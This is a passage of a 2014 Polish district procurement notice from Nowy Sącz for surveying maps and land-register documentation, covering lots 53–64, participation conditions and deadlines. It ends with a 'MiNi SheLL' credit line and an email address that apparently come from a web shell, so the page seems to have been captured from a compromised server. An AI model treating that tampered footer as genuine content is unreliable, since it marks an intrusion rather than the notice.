53	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 73, 152, 250, 255, 258, 388 o łącznej pow. 1,05 ha położonych w obrębie ewidencyjnym Mokra Wieś gmina Podegrodzie wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

54	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 66, 109, 411/5, 256/2 o łącznej pow. 0,37 ha położonych w obrębie ewidencyjnym Naszacowice gmina Podegrodzie wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

55	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działki ewidencyjnej nr 350 o pow. 0,25 ha położonej w obrębie ewidencyjnym Olszana gmina Podegrodzie wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

56	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych pod nr jednostki rejestrowej 14 (22 działki) o łącznej pow. 3,3252 ha położonych w obrębie ewidencyjnym Podegrodzie gmina Podegrodzie wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

57	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 332, 485/1, 502/1 o łącznej pow. 2,02 ha położonych w obrębie ewidencyjnym Stadła gmina Podegrodzie wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

58	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 100/1, 115, 670/2 o łącznej pow. 0,35 ha położonych w obrębie ewidencyjnym Rytro gmina Rytro wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

59	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 227, 228, 261, 282 o łącznej pow. 1,51 ha położonych w obrębie ewidencyjnym Barcice Dolne gmina Stary Sącz wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

60	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działki ewidencyjnej nr 26 o pow. 0,32 ha położonej w obrębie ewidencyjnym Moszczenica Wyżna gmina Stary Sącz wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

61	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych nr 5, 120, 165, 197, 349, 357, 368, 379, 371 o łącznej pow. 1,66 ha położonych w obrębie ewidencyjnym Mostki gmina Stary Sącz wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia numeru księgi wieczystej do zmiany oznaczenia nieruchomości. 

62	Ustalenie przebiegu granic polegające na rozdzieleniu stanów prawnych w działce ewidencyjnej 509 o pow. 0,9887 ha położonej w obrębie Krynica Słotwiny miasto Krynica-Zdrój. W skład działki ewidencyjnej nr 509 wchodzi pgr 380 obj. Księgą wieczystą NS1M/00006458/5 i prg 381 obj. Księgą wieczystą NS1M/0002609/1. 

63	Analiza stanu prawnego nieruchomości Skarbu Państwa dla księgi wieczystej NS1M/00001002/9 (135 parcel gruntowych/działek) o łącznej pow. 83,5393 ha położonych w obrębie Wierchomla Wielka gmina Muszyna. Przedmiotem analizy jest wykonanie wykazów zmian gruntowych oraz map do celów prawnych tj. kopii map z wykazem synchronizacyjnym oraz tabelaryczny wykaz powierzchni parcel gruntowych obj. w/w księgą wieczystą. 

64	Sporządzenie mapy do celów prawnych tj. kopii mapy z wykazem synchronizacyjnym dla działek ewidencyjnych pod nr jednostki rejestrowej 3 (16 działek) o łącznej pow. 1,42 ha położonych w obrębie ewidencyjnym Bącza Kunina gmina Nawojowa wraz z kompletem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości lub w przypadku ustalenia nr księgi wieczystej do zmiany oznaczenia nieruchomości.
Szczegółowy opis przedmiotu zamówienia znajduje się w specyfikacji istotnych warunków zamówienia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 71.35.40.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 64.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Z uwagi na wartość przedmiotu zamówienia Zamawiający nie wymaga
wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca
potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22 ust. 1 ustawy Prawo
zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do specyfikacji). Zamawiający
dokona oceny spełniania warunków zgodnie z formułą: spełnia - nie spełnia, na podstawie
informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca
potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22 ust. 1 ustawy Prawo
zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do specyfikacji). Zamawiający
dokona oceny spełniania warunków zgodnie z formułą: spełnia - nie spełnia, na podstawie
informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca
potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22 ust. 1 ustawy Prawo
zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do specyfikacji). Zamawiający
dokona oceny spełniania warunków zgodnie z formułą: spełnia - nie spełnia, na podstawie
informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający wymaga w szczególności aby: zamówienie na realizację części 1 
wykonywane było przez osoby posiadające uprawnienia zawodowe w zakresie szacowania
nieruchomości, zamówienie na realizację części od 2 do 64 wykonywane było przez osoby
posiadające uprawnienia zawodowe w dziedzinie geodezji i kartografii. Wykonawca potwierdza
spełnianie warunku poprzez złożenie: - oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień
publicznych(oświadczenie to stanowi załącznik nr 3 do specyfikacji), - oświadczenia, że osoby,
które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli
ustawy nakładają obowiązek posiadania takich uprawnień (wzór oświadczenia stanowi załącznik nr
5 do specyfikacji)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca
potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22 ust. 1 ustawy Prawo
zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do specyfikacji). Zamawiający
dokona oceny spełniania warunków zgodnie z formułą: spełnia - nie spełnia, na podstawie
informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty powinien być dołączony dokument określający zasady reprezentacji oraz osoby uprawnione do
reprezentacji Wykonawcy, a jeżeli Wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo,
określające zakres umocowania, podpisane przez osoby uprawnione do reprezentowania Wykonawcy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której
dokonano wyboru Wykonawcy. Wyjątek stanowi sytuacja gdy konieczne będzie przedłużenie terminu
realizacji zamówienia z powodów niezawinionych przez Wykonawcę np. oczekiwania na wydanie
niezbędnych uzgodnień, postanowień lub decyzji innych organów (urzędów miast, urzędów gmin, sądów
powszechnych). Forma aneks do umowy. Warunek: zmiana będzie korzystna dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.nowy-sacz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w
Nowym Sączu, Zespół ds. Zamówień Publicznych, pok. 320 ul. Jagiellońska 33, 33-300 Nowy Sącz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.09.2014 godzina 10:15, miejsce: Starostwo Powiatowe w Nowym Sączu Kancelaria Administracyjna, pok. 113, ul.
Jagiellońska 33, 33-300 Nowy Sącz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com